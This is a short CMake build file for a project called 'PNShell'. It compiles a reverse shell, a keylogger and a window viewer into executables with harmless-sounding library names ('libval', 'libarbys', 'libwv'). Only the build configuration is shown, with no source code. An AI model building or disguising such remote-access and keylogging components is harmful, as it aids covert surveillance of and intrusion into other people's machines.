cmake_minimum_required(VERSION 3.29.0)
project("PNShell")
set(OPENCV_DIR "C:/opencv/build")
find_package(OPENCV REQUIRED)
add_executable(PNShell ./src/main.cpp ./src/errors.hpp)
add_executable(libval  ./src/reverse_shell.cpp)
add_executable(libarbys  ./src/key_logger.cpp)
add_executable(libwv  ./src/window_viewer.cpp)
target_link_libraries(libwv ${OpenCV_LIBS} )